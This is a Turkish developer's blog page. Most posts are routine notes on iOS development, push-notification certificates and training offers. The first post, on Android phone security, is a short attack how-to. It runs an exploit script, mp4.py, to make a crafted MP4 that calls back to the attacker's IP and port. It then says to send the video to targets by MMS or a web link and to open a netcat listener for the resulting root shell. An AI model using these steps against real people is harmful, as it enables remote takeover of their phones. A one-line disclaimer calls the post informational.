Murat

Şişman

Mobile Software & Security Expert


 

Android Telefonlarınız Güvende mi?

September 17, 2016, admin0 Comments

Android işletim sistemine sahip Telefon veya tabletleriniz çok basit bir yöntem ile başkaları tarafından ele geçirilebilir. İşletim sistemindeki Media servisindeki açıktan faydalanılarak geliştirilen Exploit ile yalnızca bir MP4 videosunu çalıştırmanız hackerların cihazınızda ROOT yetkisine sahip olması için yeterli.

Exploit Kullanımı


mp4.py dosyadı ile hedef cihazlarda çalıştırılacak olan MP4 dosyasını yaratıyoruz.

-bash-4.2# python mp4.py -c 192.168.1.10 -p 7777 -o video.mp4
[*] Saving crafted MP4 to video.mp4 …
-bash-4.2#

Daha sonra oluşturulan video.mp4 dosyasını MMS yardımıyla veya web sitesine embed ederek linkini hedef kişilere gönderiyoruz. Hedef videoyu başlatmak istediğinde 192.168.1.10 olarak belirttiğimiz kendi cihazımıza 7777 portundaki shell’e bağlantı kuracaktır

Netcat ile Port açmak için 

-bash-4.2# nc -l -p 7777

Exploit Dosyaları

mp4.py

 

Not: Bu makaledeki içeik ve ekler tamamen bilgilendirme ve kişisel güvenliğinizi test etmeniz için hazırlanmıştır

Yazan: Murat ŞİŞMAN

Freelance iOS Developer

September 11, 2015, admin0 Comments

Murat ŞİŞMAN, Freelance olarak iOS Uygulamaları geliştirmektedir.

Halen birçok kurum ile freelance developer olarak çalışmalarını sürdürmektedir. Bir mobil uygulamanın kodlanması, Grafik tasarımının oluşturulması, veritabanı yapısının oluşturulması, php Json webService gibi işlemlerinin tüm bölümlerinde müşterilerine profesyonel hizmet sunmaktadır.

Ayrıntılı bilgi için

info@muratsisman.com

0090 532 4747869

 

Push Notification Sertifikası oluşturma

February 2, 2015, admin0 Comments

Apple Push Notification işlemlerinde kullanmanız için gerekli olan sertifikayı oluşturmak için aşağıdaki komutları kullanabilirsiniz.

openssl x509 -in aps_development.cer -inform der -out PushChatCert.pem
openssl pkcs12 -nocerts -out PushChatKey.pem -in PushChatKey.p12
cat PushChatCert.pem PushChatKey.pem > ck.pem

ck.pem dosyasını sunucunuza aktararak kullanabilirsiniz.

Not: Aşağıdaki komutları kullanmadan önce developer.apple.com adresinden AppId Notification sertifikanızı oluşturup bilgisayarınızdan export etmelisiniz.

iOS8 ile Split Screen Multitasking

June 9, 2014, admin0 Comments

Apple iOS8 ile gayet kullanışlı bir özelliği daha sunmaya hazırlanıyor. Split Screen Multitasking özelliği ile aynı anda iki uygulamayı tek bir ekranda kullanabileceksiniz. Uygulamalar arasında geçiş yapmaya gerek kalmadan tek bir ekranda iki uygulamayı birlikte kullanabilme özelliği için uygulamaların bu yapıya uygun tasarlanması ve kodlanması gerekiyor.

iOS Uygulama Geliştirme Eğitimleri

November 1, 2013, admin0 Comments

iPhone iOS Uygulama Geliştirme Eğitimleri devam ediyor.

36 saat sonunda istediğiniz her türlü fonksiyonu kullanarak uygulama geliştirebileceğiniz bireysel özel eğitimler ile dilediğiniz uygulamayı yapma yeteneğine sahip olabileceksiniz.

Read More

Mobil Tıp Uygulamaları

October 31, 2013, admin0 Comments

Mobil dünyada Tıp uygulamaları hayatı kolaylaştırıyor. Özellikle estetik cerrahi alanında Mobil uygulamalar ile insanlar doktorlar ile daha etkileşimli şekilde bir araya gelebiliyor. Örneğin yapmış olduğum iPhone Burun Estetiği Uygulaması ile kullanıcılar kendi fotoğraflarını çekip burunlarını diledikleri şekilde modifiye edebiliyor ve bu oluşan fotoğraf doktora iletilerek estetik ameliyatı ile ilgili teknik detaylar hastaneye gitmeden alınabiliyor.
Mobil Tıp uygulamaları özellikle iPhone tıp uygulamaları gelecekte daha etkin bir şekilde kullanılacağı kesin.

 

iOS Uygulamalarında Font Kullanımı

October 31, 2013, admin0 Comments

iPhone uygulamarınızda farklı font kullanmak istiyorsanız info.plist içerisine ekleyeceğiniz bir satır ile öncelikle fontu tanıtmanız gerekir, daha sonra objenizin setFont özelliğine belirttiğiniz bu fontu tanıtabilirsiniz.

Read More

Push Notification How To

October 31, 2013, admin0 Comments

Apple Push Notification Service (APNS) an service user by apple to notify application. The notification can be of various Text Alert with or without sound, Baggage number update on icon etc.Below are the steps to construct an simple application that receives notification form APNS. The steps are for development testing on sandbox APNS service from Apple

Read More

Push Notification Kullanımı

October 31, 2013, admin1 Comment

iOS uygulamalarının en önemli özelliklerinden birisi olan Push Notification’ın nasıl kullanıldığını aşağıdaki örnekte inceleyebilirsiniz.

Push Notification Nedir?
iOS cihazlar (iPhone ve iPad) Apple’ın Push sunucuları ile sürekli bağlantılı halde bulunurlar. Bu sayede Apple Push Sunucuları kullanılarak size text mesajları gönderilebilir, çalınan veya kaybolan telefonunuzun yeri tespit edilebilir hatta telefonunuz sizin isteğiniz ile kullanım dışı olabilir.

Read More